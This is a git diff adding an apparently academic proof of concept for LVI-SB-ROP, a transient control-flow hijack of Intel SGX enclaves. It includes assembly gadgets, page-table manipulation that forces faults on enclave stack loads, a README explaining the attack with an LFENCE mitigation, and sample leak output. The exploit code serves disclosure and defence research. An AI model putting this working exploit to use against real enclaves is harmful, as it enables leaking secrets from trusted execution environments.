diff --git a/app/lvi/Enclave/Makefile b/app/lvi/Enclave/Makefile index 601e183..a2baaa1 100644 --- a/app/lvi/Enclave/Makefile +++ b/app/lvi/Enclave/Makefile @@ -7,7 +7,7 @@ INCLUDE = -I$(SGX_SDK)/include/ -I$(SGX_SDK)/include/tlibc T_CFLAGS = $(CFLAGS) -nostdinc -fvisibility=hidden -fpie -fstack-protector -g -Os U_CFLAGS = $(CFLAGS) -nostdinc -fvisibility=hidden -fpie -fstack-protector -g AR_FLAGS = rcs -OBJECTS = encl.o +OBJECTS = encl.o asm.o LIB_SGX_TRTS = -lsgx_trts LIB_SGX_TSERVICE = -lsgx_tservice diff --git a/app/lvi/Enclave/asm.S b/app/lvi/Enclave/asm.S new file mode 100644 index 0000000..b166643 --- /dev/null +++ b/app/lvi/Enclave/asm.S @@ -0,0 +1,68 @@ +#define OFFSET 20 +#define CHAR 'R' +#define LFENCE 0 + + .data +rsp_backup: + .quad 0x0 + + .text + .global ecall_init_stack +ecall_init_stack: + /* NOTE: we setup an explicit dummy stack to easily revoke access rights and keep the poc code minimal */ + push %rax + push %rbx + + lea page_b(%rip), %rbx + add $OFFSET, %rbx + movq $'B', (%rbx) + lea do_real_ret(%rip), %rax + mov %rax, 8(%rbx) + + pop %rbx + pop %rax + ret + + .text + .align 0x1000 /* make sure ret_gadget is on the same page and in the TLB */ + .global ecall_lvi_sb_rop + # %rdi store_pt + # %rsi oracle_pt +ecall_lvi_sb_rop: + mov %rsp, rsp_backup(%rip) + lea page_b(%rip), %rsp + add $OFFSET, %rsp + + /* transient delay */ + clflush dummy(%rip) + mov dummy(%rip), %rax + + /* STORE TO USER ADRS */ + movq $CHAR, (%rdi) + lea ret_gadget(%rip), %rax + movq %rax, 8(%rdi) + + /* HIJACK TRUSTED LOAD FROM ENCLAVE STACK */ + /* should go to do_real_ret; will transiently go to ret_gadget if we fault on the stack loads */ + pop %rax +#if LFENCE + notq (%rsp) + notq (%rsp) + lfence + ret +#else + ret +#endif + +1: jmp 1b + mfence + +do_real_ret: + mov rsp_backup(%rip), %rsp + ret + +ret_gadget: + shl $0xc, %rax + movq (%rsi, %rax), %rdx +1: jmp 1b + mfence diff --git a/app/lvi/Enclave/encl.c b/app/lvi/Enclave/encl.c index 1508d2c..008daa7 100644 --- a/app/lvi/Enclave/encl.c +++ b/app/lvi/Enclave/encl.c @@ -19,20 +19,7 @@ #include #define OFFSET 20 -#define FILL_STORE_BUFFER 1 - -#if FILL_STORE_BUFFER - char __attribute__((aligned(0x1000))) dummy_buf[4096 * 64]; - inline void __attribute__((always_inline)) fill_store_buffer(int offset) - { - for(int i = 0; i < 64; i++) - { - dummy_buf[((offset + 67) % 4096) + i * 4096] = 0x1; - } - } -#else - #define fill_store_buffer(offset) -#endif +#define LFENCE 0 inline void __attribute__((always_inline)) maccess(void *p) { @@ -78,7 +65,6 @@ void ecall_lvi_store_user(uint64_t *user_pt, char *oracle) /* 0. Fence to protect against Spectre v1 */ __builtin_ia32_lfence(); transient_delay(); - fill_store_buffer(OFFSET); /* 1. STORE to attacker-controlled _untrusted_ address */ *user_pt = (uint64_t) 'S'; @@ -86,6 +72,10 @@ void ecall_lvi_store_user(uint64_t *user_pt, char *oracle) /* 2. VICTIM LOAD: inject 'S' and override trusted value 'B' */ volatile char valb = *pt_b; +#if LFENCE + asm("lfence"); +#endif + /* 3. VICTIM ENCODE: e.g., cache-based covert channel gadget */ volatile char leak = oracle[4096*valb]; } @@ -101,6 +91,11 @@ void ecall_lvi_remap_l1d(char *oracle) /* VICTIM LOAD: inject 'A' from remapped physical address for trusted load to 'B'*/ volatile char valb = *pt_b; + +#if LFENCE + asm("lfence"); +#endif + /* VICTIM ENCODE: e.g., cache-based covert channel gadget */ volatile char leak = oracle[4096*valb]; } diff --git a/app/lvi/Enclave/encl.edl b/app/lvi/Enclave/encl.edl index 5476aff..f10f766 100644 --- a/app/lvi/Enclave/encl.edl +++ b/app/lvi/Enclave/encl.edl @@ -6,6 +6,9 @@ enclave { public void ecall_lvi_store_user([user_check] uint64_t *user_pt, [user_check] char *oracle); public void ecall_lvi_remap_l1d([user_check] char *oracle); + + public void ecall_init_stack(void); + public int ecall_lvi_sb_rop([user_check] uint64_t *user_pt, [user_check] char *oracle); }; untrusted { diff --git a/app/lvi/README.md b/app/lvi/README.md index 7a2d135..56ca70b 100644 --- a/app/lvi/README.md +++ b/app/lvi/README.md @@ -181,3 +181,81 @@ Flush+Reload Threshold: 226 +-------------------------------------------------------------------------------------------+ A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A ``` + +## LVI-SB-ROP: Transient control flow hijacking + +Consider the minimal example code gadget below: + +-------------------------------------------------------------------------------- +```C +1 void ecall_lvi_store_user(uint64_t *user_pt, uint64_t user_val, char *oracle) +2 { +3 *user_pt = user_val; /* VICTIM STORE: write user-controlled value to extra-enclave user memory */ +4 return; /* VICTIM LOAD: inject from user store 4K alias (i.e., control flow hijack) */ +6 } +``` +-------------------------------------------------------------------------------- + +**Attack procedure.** We again rely on an attacker-controlled user pointer +dereference inside the enclave. Where the above LVI variant faulted on user +memory loads, we now provoke page faults on legitimate enclave memory load +instructions. Specifically we require that the enclave first stores a +(user-controlled) value to a user-controlled untrusted address (line 3). +Subsequently, the enclave "return" statement performs a _legit_ load from the +enclave stack (line 4) and uses that value as a trusted return address to +redirect control flow. + +Architecturally the enclave will always follow the intended control/data flow, +but an SGX page table adversary may force the legit load on line (4) to fault +and read the untrusted attacker value from the store buffer instead of from +trusted enclave memory. The transient instructions following the faulting load +will now compute on the value from the store buffer and hence redirect +transient control flow to an arbitrary attacker-controlled location. Much like +Spectre v2 branch poisoning attacks, this ultimately allows attackers to abuse +"2nd-stage gadgets" in the existing enclave code base to dereference arbitrary +secrets and encode them in the microarchitectural CPU state. + +Note that for clarity we focused on hijacking RET control flow in the above +example, but we also demonstrated successful LVI attacks for JMP/CALL indirect +control flow instructions. This effectively shows that we can arbitrarily +hijack transient return control flow, even in the presence of strong +Spectre-RSB/BTB mitigations that flush shared RSB/BTB buffers on enclave entry. +Interestingly, we also found that large or multiple user stores enable +attackers to setup a fake "transient stack" in the store buffer so as to +repeatedly inject illegal values for consecutive enclave stack loads (POP/RET +sequences). Much like in architectural ROP, such capability allows to chain +together multiple 2nd stage gadgets to compose arbitrary transient computations +of interest. + +**Suggested mitigation.** Insert LFENCE instructions after loading branch target addresses from trusted memory, and before redirecting control flow. Break up x86 `ret` instructions into explicit load and branch instructions. + +**Proof-of-concept code.** Enable this PoC through `#define LVI_SB_ROP 1` in `main.c`. Example output for `make run` as follows (on a processor vulnerable to [Fallout](https://mdsattacks.com/)/[MSBDS](https://software.intel.com/security-software-guidance/insights/deep-dive-intel-analysis-microarchitectural-data-sampling)): + +``` $ make run +Flush+Reload Threshold: 227 +[sched.c] continuing on CPU 1 +[main.c] Creating enclave... +==== Victim Enclave ==== +[pt.c] /dev/sgx-step opened! + Base: 0x7f8e67000000 + Size: 8388608 + Limit: 0x7f8e67800000 + TCS: 0x7f8e67481000 + SSA: 0x7f8e67482f48 + AEP: 0x7f8e695fa845 + EDBGRD: debug +[main.c] oracle at 0x563fd9561000 +[main.c] user_page at 0x563fd9661000 +[main.c] enclave_page_a at 0x7f8e6721e000 w PTE +[pt.c] /dev/mem opened! ++-------------------------------------------------------------------------------------------+ +| XD | PK | IGN | RSVD | PHYS ADRS | IGN | G | PAT | D | A | PCD | PWT | U/S | R/W | P | +| 0 | x | x | 0 | 0x00007053e000 | x | x | x | 1 | 1 | x | x | 1 | 1 | 1 | ++-------------------------------------------------------------------------------------------+ +[main.c] enclave_page_b at 0x7f8e6721d000 w PTE ++-------------------------------------------------------------------------------------------+ +| XD | PK | IGN | RSVD | PHYS ADRS | IGN | G | PAT | D | A | PCD | PWT | U/S | R/W | P | +| 0 | x | x | 0 | 0x00007053f000 | x | x | x | 1 | 1 | x | x | 1 | 1 | 1 | ++-------------------------------------------------------------------------------------------+ +R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R R +``` diff --git a/app/lvi/main.c b/app/lvi/main.c index b158b6d..a939af1 100644 --- a/app/lvi/main.c +++ b/app/lvi/main.c @@ -35,12 +35,11 @@ /* XXX select attack scenario below */ #define LVI_SB 0 -#define LVI_L1D 1 -#define LVI_SB_ROP 0 -#define LVI_L1D_ROP 0 +#define LVI_L1D 0 +#define LVI_SB_ROP 1 char __attribute__((aligned(0x1000))) oracle[256 * 4096]; -char __attribute__((aligned(0x1000))) user_page[4096*64]; +char __attribute__((aligned(0x1000))) user_page[4096]; void *enclave_page_a = NULL, *enclave_page_b = NULL; char *user_pt = user_page; uint64_t *pte_a = NULL, *pte_b = NULL; @@ -82,7 +81,7 @@ void fault_handler(int signal) int main( int argc, char **argv ) { sgx_launch_token_t token = {0}; - int updated = 0; + int updated = 0, rv; sgx_enclave_id_t eid = 0; /* Calculate Flush+Reload threshold */ @@ -115,6 +114,10 @@ int main( int argc, char **argv ) pte_b = remap_page_table_level( enclave_page_b, PTE); print_pte(pte_b); pte_b_valid = *pte_b; + +#if LVI_SB_ROP + SGX_ASSERT( ecall_init_stack(eid) ); +#endif /* Inject false load values */ mfence(); @@ -132,7 +135,8 @@ int main( int argc, char **argv ) *pte_b = *pte_a; SGX_ASSERT( ecall_lvi_remap_l1d(eid, oracle) ); #elif LVI_SB_ROP - #elif LVI_L1D_ROP + *pte_b = MARK_SUPERVISOR(*pte_b); + SGX_ASSERT( ecall_lvi_sb_rop(eid, &rv, (void*) user_pt+OFFSET, oracle) ); #endif } }